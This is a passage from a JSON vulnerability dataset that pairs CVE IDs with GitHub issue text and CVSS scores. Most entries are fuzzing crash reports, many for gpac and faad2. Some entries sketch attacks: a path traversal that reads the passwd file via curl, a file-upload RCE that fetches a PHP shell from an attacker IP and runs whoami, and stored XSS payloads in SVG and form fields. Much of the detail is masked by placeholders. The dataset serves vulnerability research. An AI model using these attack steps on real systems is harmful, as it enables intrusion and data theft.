  66684. "Issue_Created_At": "2021-04-22T08:05:19Z",
  66685. "description": "null dereference issue in APITAG abst_box_size. Hi, There is a null dereference issue in gpac APITAG abst_box_size,this can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66686. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66687. "severity": "MEDIUM",
  66688. "baseScore": 5.5,
  66689. "impactScore": 3.6,
  66690. "exploitabilityScore": 1.8
  66691. },
  66692. {
  66693. "CVE_ID": "CVE-2021-32134",
  66694. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1756",
  66695. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1756",
  66696. "Repo_new": "gpac/gpac",
  66697. "Issue_Created_At": "2021-04-23T00:50:46Z",
  66698. "description": "null dereference in APITAG gf_odf_desc_copy. Hi, There is a null dereference issue in gpac APITAG gf_odf_desc_copy,this can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66699. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66700. "severity": "MEDIUM",
  66701. "baseScore": 5.5,
  66702. "impactScore": 3.6,
  66703. "exploitabilityScore": 1.8
  66704. },
  66705. {
  66706. "CVE_ID": "CVE-2021-32135",
  66707. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1757",
  66708. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1757",
  66709. "Repo_new": "gpac/gpac",
  66710. "Issue_Created_At": "2021-04-23T00:51:46Z",
  66711. "description": "null dereference in APITAG trak_box_size. Hi, There is a null dereference issue in gpac APITAG trak_box_size,this can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66712. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66713. "severity": "MEDIUM",
  66714. "baseScore": 5.5,
  66715. "impactScore": 3.6,
  66716. "exploitabilityScore": 1.8
  66717. },
  66718. {
  66719. "CVE_ID": "CVE-2021-32136",
  66720. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1765",
  66721. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1765",
  66722. "Repo_new": "gpac/gpac",
  66723. "Issue_Created_At": "2021-04-30T00:42:12Z",
  66724. "description": "FILETAG",
  66725. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66726. "severity": "HIGH",
  66727. "baseScore": 7.8,
  66728. "impactScore": 5.9,
  66729. "exploitabilityScore": 1.8
  66730. },
  66731. {
  66732. "CVE_ID": "CVE-2021-32137",
  66733. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1766",
  66734. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1766",
  66735. "Repo_new": "gpac/gpac",
  66736. "Issue_Created_At": "2021-04-30T00:43:52Z",
  66737. "description": "FILETAG",
  66738. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66739. "severity": "MEDIUM",
  66740. "baseScore": 5.5,
  66741. "impactScore": 3.6,
  66742. "exploitabilityScore": 1.8
  66743. },
  66744. {
  66745. "CVE_ID": "CVE-2021-32138",
  66746. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1767",
  66747. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1767",
  66748. "Repo_new": "gpac/gpac",
  66749. "Issue_Created_At": "2021-04-30T00:45:19Z",
  66750. "description": "null dereference in APITAG APITAG Hi, There is a null dereference issue in gpac APITAG APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66751. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66752. "severity": "MEDIUM",
  66753. "baseScore": 5.5,
  66754. "impactScore": 3.6,
  66755. "exploitabilityScore": 1.8
  66756. },
  66757. {
  66758. "CVE_ID": "CVE-2021-32139",
  66759. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1768",
  66760. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1768",
  66761. "Repo_new": "gpac/gpac",
  66762. "Issue_Created_At": "2021-04-30T00:46:26Z",
  66763. "description": "null dereference in gpac APITAG gf_isom_vp_config_get. Hi, There is a null dereference issue in gpac APITAG gf_isom_vp_config_get,this can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66764. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66765. "severity": "MEDIUM",
  66766. "baseScore": 5.5,
  66767. "impactScore": 3.6,
  66768. "exploitabilityScore": 1.8
  66769. },
  66770. {
  66771. "CVE_ID": "CVE-2021-3223",
  66772. "Issue_Url_old": "https://github.com/node-red/node-red-dashboard/issues/669",
  66773. "Issue_Url_new": "https://github.com/node-red/node-red-dashboard/issues/669",
  66774. "Repo_new": "node-red/node-red-dashboard",
  66775. "Issue_Created_At": "2021-01-11T04:39:02Z",
  66776. "description": "Path traversal . In FILETAG , the URL is matched PATHTAG ' and then passed to APITAG The lack of verification of the final path leads to a path traversal vulnerability. We can use this vulnerability to read sensitive data on the server, such as FILETAG . What are the steps to reproduce NUMBERTAG Install node red dashboard on node red server NUMBERTAG curl PATHTAG What happens? The server returns the passwd file content What do you expect to happen? ERRORTAG Please tell us about your environment: [x] Node RED Dashboard version NUMBERTAG Node RED version NUMBERTAG FILETAG version: APITAG [x] npm version NUMBERTAG Platform/OS: linux [ ] Browser: None",
  66777. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66778. "severity": "HIGH",
  66779. "baseScore": 7.5,
  66780. "impactScore": 3.6,
  66781. "exploitabilityScore": 3.9
  66782. },
  66783. {
  66784. "CVE_ID": "CVE-2021-3224",
  66785. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/28",
  66786. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/28",
  66787. "Repo_new": "cskaza/cszcms",
  66788. "Issue_Created_At": "2021-01-13T02:19:45Z",
  66789. "description": "Stored XSS Vulnerability In PATHTAG APITAG Hi\uff0c MENTIONTAG I found a Stored XSS Vulnerability In PATHTAG APITAG In content page APITAG content Parameter are not filtered\uff1a FILETAG FILETAG POC:a\u201d> APITAG FILETAG FILETAG FILETAG FILETAG FILETAG Author:leerina",
  66790. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  66791. "severity": "MEDIUM",
  66792. "baseScore": 5.4,
  66793. "impactScore": 2.7,
  66794. "exploitabilityScore": 2.3
  66795. },
  66796. {
  66797. "CVE_ID": "CVE-2021-32243",
  66798. "Issue_Url_old": "https://github.com/FOGProject/fogproject/issues/422",
  66799. "Issue_Url_new": "https://github.com/fogproject/fogproject/issues/422",
  66800. "Repo_new": "fogproject/fogproject",
  66801. "Issue_Created_At": "2021-04-29T11:39:10Z",
  66802. "description": "APITAG NUMBERTAG File Upload RCE APITAG NUMBERTAG Create an empty NUMBERTAG Mb file. dd PATHTAG of=myshell bs NUMBERTAG count NUMBERTAG Add your PHP code to the end of the file created in the step NUMBERTAG echo ' APITAG ' >> myshell NUMBERTAG Put the file \"myshell\" accessible through HTTP. $ cp myshell PATHTAG NUMBERTAG Encode the URL to get \"myshell\" file to base NUMBERTAG APITAG Attacker IP). $ echo \" URLTAG \" | base NUMBERTAG APITAG NUMBERTAG isit URLTAG Example: URLTAG NUMBERTAG Appears a textbox, change the Kernel Name APITAG to FILETAG and click on Install NUMBERTAG isit URLTAG execute system whoami command",
  66803. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  66804. "severity": "HIGH",
  66805. "baseScore": 8.8,
  66806. "impactScore": 5.9,
  66807. "exploitabilityScore": 2.8
  66808. },
  66809. {
  66810. "CVE_ID": "CVE-2021-32245",
  66811. "Issue_Url_old": "https://github.com/pagekit/pagekit/issues/963",
  66812. "Issue_Url_new": "https://github.com/pagekit/pagekit/issues/963",
  66813. "Repo_new": "pagekit/pagekit",
  66814. "Issue_Created_At": "2021-04-30T08:11:10Z",
  66815. "description": "A stored XSS has been found in APITAG CMS affecting versions NUMBERTAG Problem A user can upload SVG files in the file upload portion of the CMS. These SVG files can contain malicious scripts. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to PATHTAG that will point to FILETAG When a user comes along to click that link, it will trigger a XSS attack. exp.svg APITAG APITAG APITAG APITAG APITAG alert(/xss/); APITAG APITAG Technical Details Pagekit version NUMBERTAG Webserver: APITAG Database: APITAG PHP Version NUMBERTAG",
  66816. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  66817. "severity": "MEDIUM",
  66818. "baseScore": 5.4,
  66819. "impactScore": 2.7,
  66820. "exploitabilityScore": 2.3
  66821. },
  66822. {
  66823. "CVE_ID": "CVE-2021-32263",
  66824. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/13",
  66825. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/13",
  66826. "Repo_new": "brackeen/ok-file-formats",
  66827. "Issue_Created_At": "2021-04-29T11:33:39Z",
  66828. "description": "heap buffer overflow in APITAG at APITAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Version dev version, git clone FILETAG Environment Ubuntu NUMBERTAG bit Reproduce test program ERRORTAG Compile test program with Address Sanitizer: APITAG Asan Report ERRORTAG APITAG FILETAG",
  66829. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66830. "severity": "HIGH",
  66831. "baseScore": 7.8,
  66832. "impactScore": 5.9,
  66833. "exploitabilityScore": 1.8
  66834. },
  66835. {
  66836. "CVE_ID": "CVE-2021-32268",
  66837. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1587",
  66838. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1587",
  66839. "Repo_new": "gpac/gpac",
  66840. "Issue_Created_At": "2020-09-04T15:05:21Z",
  66841. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG a NUMBERTAG e URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG disox ttxt NUMBERTAG dump chap ogg dump cover drtp bt out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  66842. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66843. "severity": "HIGH",
  66844. "baseScore": 7.8,
  66845. "impactScore": 5.9,
  66846. "exploitabilityScore": 1.8
  66847. },
  66848. {
  66849. "CVE_ID": "CVE-2021-32269",
  66850. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1574",
  66851. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1574",
  66852. "Repo_new": "gpac/gpac",
  66853. "Issue_Created_At": "2020-08-13T03:20:26Z",
  66854. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  66855. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66856. "severity": "MEDIUM",
  66857. "baseScore": 5.5,
  66858. "impactScore": 3.6,
  66859. "exploitabilityScore": 1.8
  66860. },
  66861. {
  66862. "CVE_ID": "CVE-2021-32270",
  66863. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1586",
  66864. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1586",
  66865. "Repo_new": "gpac/gpac",
  66866. "Issue_Created_At": "2020-09-04T14:58:11Z",
  66867. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG a NUMBERTAG e URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  66868. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66869. "severity": "MEDIUM",
  66870. "baseScore": 5.5,
  66871. "impactScore": 3.6,
  66872. "exploitabilityScore": 1.8
  66873. },
  66874. {
  66875. "CVE_ID": "CVE-2021-32271",
  66876. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1575",
  66877. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1575",
  66878. "Repo_new": "gpac/gpac",
  66879. "Issue_Created_At": "2020-08-15T01:36:37Z",
  66880. "description": "A stack buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso NUMBERTAG d diod latm keep utc out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  66881. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66882. "severity": "HIGH",
  66883. "baseScore": 7.8,
  66884. "impactScore": 5.9,
  66885. "exploitabilityScore": 1.8
  66886. },
  66887. {
  66888. "CVE_ID": "CVE-2021-32272",
  66889. "Issue_Url_old": "https://github.com/knik0/faad2/issues/57",
  66890. "Issue_Url_new": "https://github.com/knik0/faad2/issues/57",
  66891. "Repo_new": "knik0/faad2",
  66892. "Issue_Created_At": "2020-08-30T15:27:09Z",
  66893. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master NUMBERTAG ae URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
  66894. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66895. "severity": "HIGH",
  66896. "baseScore": 7.8,
  66897. "impactScore": 5.9,
  66898. "exploitabilityScore": 1.8
  66899. },
  66900. {
  66901. "CVE_ID": "CVE-2021-32273",
  66902. "Issue_Url_old": "https://github.com/knik0/faad2/issues/56",
  66903. "Issue_Url_new": "https://github.com/knik0/faad2/issues/56",
  66904. "Repo_new": "knik0/faad2",
  66905. "Issue_Created_At": "2020-08-16T07:27:58Z",
  66906. "description": "A stack buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master eb NUMBERTAG fa URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
  66907. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66908. "severity": "HIGH",
  66909. "baseScore": 7.8,
  66910. "impactScore": 5.9,
  66911. "exploitabilityScore": 1.8
  66912. },
  66913. {
  66914. "CVE_ID": "CVE-2021-32274",
  66915. "Issue_Url_old": "https://github.com/knik0/faad2/issues/60",
  66916. "Issue_Url_new": "https://github.com/knik0/faad2/issues/60",
  66917. "Repo_new": "knik0/faad2",
  66918. "Issue_Created_At": "2020-08-30T15:53:54Z",
  66919. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master NUMBERTAG ae URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
  66920. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66921. "severity": "HIGH",
  66922. "baseScore": 7.8,
  66923. "impactScore": 5.9,
  66924. "exploitabilityScore": 1.8
  66925. },
  66926. {
  66927. "CVE_ID": "CVE-2021-32275",
  66928. "Issue_Url_old": "https://github.com/grame-cncm/faust/issues/482",
  66929. "Issue_Url_new": "https://github.com/grame-cncm/faust/issues/482",
  66930. "Repo_new": "grame-cncm/faust",
  66931. "Issue_Created_At": "2020-08-26T02:30:17Z",
  66932. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faust (latest master c NUMBERTAG d2 URLTAG Configure cmake . DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DINCLUDE_STATIC=on DINCLUDE_HTTP=off DINCLUDE_OSC=off Command line PATHTAG lang ocpp o /tmp/faust e lcc exp NUMBERTAG lb rb mem sd APITAG APITAG output ERRORTAG POC FILETAG",
  66933. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66934. "severity": "MEDIUM",
  66935. "baseScore": 5.5,
  66936. "impactScore": 3.6,
  66937. "exploitabilityScore": 1.8
  66938. },
  66939. {
  66940. "CVE_ID": "CVE-2021-32276",
  66941. "Issue_Url_old": "https://github.com/knik0/faad2/issues/58",
  66942. "Issue_Url_new": "https://github.com/knik0/faad2/issues/58",
  66943. "Repo_new": "knik0/faad2",
  66944. "Issue_Created_At": "2020-08-30T15:29:51Z",
  66945. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master NUMBERTAG ae URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
  66946. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66947. "severity": "MEDIUM",
  66948. "baseScore": 5.5,
  66949. "impactScore": 3.6,
  66950. "exploitabilityScore": 1.8
  66951. },
  66952. {
  66953. "CVE_ID": "CVE-2021-32277",
  66954. "Issue_Url_old": "https://github.com/knik0/faad2/issues/59",
  66955. "Issue_Url_new": "https://github.com/knik0/faad2/issues/59",
  66956. "Repo_new": "knik0/faad2",
  66957. "Issue_Created_At": "2020-08-30T15:32:46Z",
  66958. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master NUMBERTAG ae URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
  66959. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66960. "severity": "HIGH",
  66961. "baseScore": 7.8,
  66962. "impactScore": 5.9,
  66963. "exploitabilityScore": 1.8
  66964. },
  66965. {
  66966. "CVE_ID": "CVE-2021-32278",
  66967. "Issue_Url_old": "https://github.com/knik0/faad2/issues/62",
  66968. "Issue_Url_new": "https://github.com/knik0/faad2/issues/62",
  66969. "Repo_new": "knik0/faad2",
  66970. "Issue_Created_At": "2020-09-04T14:47:28Z",
  66971. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master f NUMBERTAG b5e URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
  66972. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66973. "severity": "HIGH",
  66974. "baseScore": 7.8,
  66975. "impactScore": 5.9,
  66976. "exploitabilityScore": 1.8
  66977. },
  66978. {
  66979. "CVE_ID": "CVE-2021-32281",
  66980. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/313",
  66981. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/313",
  66982. "Repo_new": "marcobambini/gravity",
  66983. "Issue_Created_At": "2020-08-07T04:58:06Z",
  66984. "description": "A heap buffer overflow in APITAG can cause abort. System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master ecbee9f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG o /tmp/grav q c APITAG Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  66985. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66986. "severity": "HIGH",
  66987. "baseScore": 7.8,
  66988. "impactScore": 5.9,
  66989. "exploitabilityScore": 1.8
  66990. },
  66991. {
  66992. "CVE_ID": "CVE-2021-32282",
  66993. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/315",
  66994. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/315",
  66995. "Repo_new": "marcobambini/gravity",
  66996. "Issue_Created_At": "2020-08-07T14:09:43Z",
  66997. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master ecbee9f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG o /tmp/grav q c APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  66998. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66999. "severity": "MEDIUM",
  67000. "baseScore": 5.5,
  67001. "impactScore": 3.6,
  67002. "exploitabilityScore": 1.8
  67003. },
  67004. {
  67005. "CVE_ID": "CVE-2021-32283",
  67006. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/314",
  67007. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/314",
  67008. "Repo_new": "marcobambini/gravity",
  67009. "Issue_Created_At": "2020-08-07T14:07:36Z",
  67010. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master ecbee9f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG o /tmp/grav q c APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  67011. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67012. "severity": "MEDIUM",
  67013. "baseScore": 5.5,
  67014. "impactScore": 3.6,
  67015. "exploitabilityScore": 1.8
  67016. },
  67017. {
  67018. "CVE_ID": "CVE-2021-32284",
  67019. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/321",
  67020. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/321",
  67021. "Repo_new": "marcobambini/gravity",
  67022. "Issue_Created_At": "2020-08-30T16:46:44Z",
  67023. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master c NUMBERTAG e NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
  67024. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67025. "severity": "HIGH",
  67026. "baseScore": 7.8,
  67027. "impactScore": 5.9,
  67028. "exploitabilityScore": 1.8
  67029. },
  67030. {
  67031. "CVE_ID": "CVE-2021-32285",
  67032. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/319",
  67033. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/319",
  67034. "Repo_new": "marcobambini/gravity",
  67035. "Issue_Created_At": "2020-08-30T16:37:45Z",
  67036. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master c NUMBERTAG e NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
  67037. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67038. "severity": "MEDIUM",
  67039. "baseScore": 5.5,
  67040. "impactScore": 3.6,
  67041. "exploitabilityScore": 1.8
  67042. },
  67043. {
  67044. "CVE_ID": "CVE-2021-32286",
  67045. "Issue_Url_old": "https://github.com/ZerBea/hcxtools/issues/155",
  67046. "Issue_Url_new": "https://github.com/zerbea/hcxtools/issues/155",
  67047. "Repo_new": "zerbea/hcxtools",
  67048. "Issue_Created_At": "2020-08-12T03:09:27Z",
  67049. "description": "A memcpy param overlap in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG hcxpcapngtool (latest master e6b NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" make Command line ./hcxpcapngtool all o /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  67050. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67051. "severity": "HIGH",
  67052. "baseScore": 7.8,
  67053. "impactScore": 5.9,
  67054. "exploitabilityScore": 1.8
  67055. },
  67056. {
  67057. "CVE_ID": "CVE-2021-32287",
  67058. "Issue_Url_old": "https://github.com/nokiatech/heif/issues/86",
  67059. "Issue_Url_new": "https://github.com/nokiatech/heif/issues/86",
  67060. "Repo_new": "nokiatech/heif",
  67061. "Issue_Created_At": "2020-08-04T07:58:10Z",
  67062. "description": "A global buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), heif (latest master NUMBERTAG fc NUMBERTAG e URLTAG Configure cmake ../srcs DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line modify APITAG use APITAG to receive filename from commandline. PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
  67063. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67064. "severity": "HIGH",
  67065. "baseScore": 7.8,
  67066. "impactScore": 5.9,
  67067. "exploitabilityScore": 1.8
  67068. },
  67069. {
  67070. "CVE_ID": "CVE-2021-32288",
  67071. "Issue_Url_old": "https://github.com/nokiatech/heif/issues/87",
  67072. "Issue_Url_new": "https://github.com/nokiatech/heif/issues/87",
  67073. "Repo_new": "nokiatech/heif",
  67074. "Issue_Created_At": "2020-08-04T14:03:20Z",
  67075. "description": "A global buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), heif (latest master NUMBERTAG fc NUMBERTAG e URLTAG Configure cmake ../srcs DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line modify APITAG use APITAG to receive filename from command line. PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
  67076. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67077. "severity": "HIGH",
  67078. "baseScore": 7.8,
  67079. "impactScore": 5.9,
  67080. "exploitabilityScore": 1.8
  67081. },
  67082. {
  67083. "CVE_ID": "CVE-2021-32289",
  67084. "Issue_Url_old": "https://github.com/nokiatech/heif/issues/85",
  67085. "Issue_Url_new": "https://github.com/nokiatech/heif/issues/85",
  67086. "Repo_new": "nokiatech/heif",
  67087. "Issue_Created_At": "2020-08-04T07:55:57Z",
  67088. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), heif (latest master NUMBERTAG fc NUMBERTAG e URLTAG Configure cmake ../srcs DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line modify APITAG use APITAG to receive filename from commandline. PATHTAG APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  67089. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67090. "severity": "MEDIUM",
  67091. "baseScore": 5.5,
  67092. "impactScore": 3.6,
  67093. "exploitabilityScore": 1.8
  67094. },
  67095. {
  67096. "CVE_ID": "CVE-2021-32294",
